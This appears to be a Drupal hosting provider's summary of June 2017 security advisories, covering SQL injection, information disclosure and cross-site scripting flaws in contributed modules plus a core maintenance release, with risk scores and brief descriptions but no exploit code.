June 2017

Services - Critical - SQL Injection

* Advisory ID: DRUPAL-SA-CONTRIB-2017-054
* Project: Services (third-party module)
* Version: 7.x
* Date: 2017-June-28
* Security risk: 19/25 ( Critical)
* Vulnerability: SQL Injection

DESCRIPTION

This module provides a standardized solution for building API's so that
external clients can communicate with Drupal.

The module doesn't sufficiently sanitize column names provided by the client
when they are querying for data and trying to sort it.

SMTP - Moderately Critical - Information Disclosure

* Advisory ID: DRUPAL-SA-CONTRIB-2017-055
* Project: SMTP Authentication Support (third-party module)
* Version: 7.x, 8.x
* Date: 2017-June-28
* Security risk: 10/25 ( Moderately Critical)
* Vulnerability: Information Disclosure

DESCRIPTION

This SMTP module enables you to send mail using a third party (non-system)
mail service instead of the local system mailer included with Drupal. When
this module is in debugging mode, it will log privileged information.

VERSIONS AFFECTED

Drupal Core - Multiple Vulnerabilities - SA-CORE-2017-003

Drupal 8.3.4 and Drupal 7.56, are maintenance releases which contain fixes for security vulnerabilities.

Please be informed all Drupal 8 and 7 website's cores and core modules on Drupion platform will be updated automatically unless otherwise was specifically requested by customer. So if you are a Drupion customer, then never worry about this security advisory. However, if you requested not to update the Drupal 8 or 7 core on your Drupion server, then please read further.

Search 404 - Moderately Critical - Cross Site Scripting

* Advisory ID: DRUPAL-SA-CONTRIB-2017-053
* Project: Search 404 (third-party module)
* Version: 7.x
* Date: 2017-June-21
* Security risk: 13/25 ( Moderately Critical)
* Vulnerability: Cross Site Scripting

DESCRIPTION

The Search 404 module enables you to redirect 404 pages to a search page on
the site for the keywords in the url that was not found.

The module did not filter administrator-provided text before displaying it to
the user on the 404 page creating a Cross Site Scripting (XSS) vulnerability.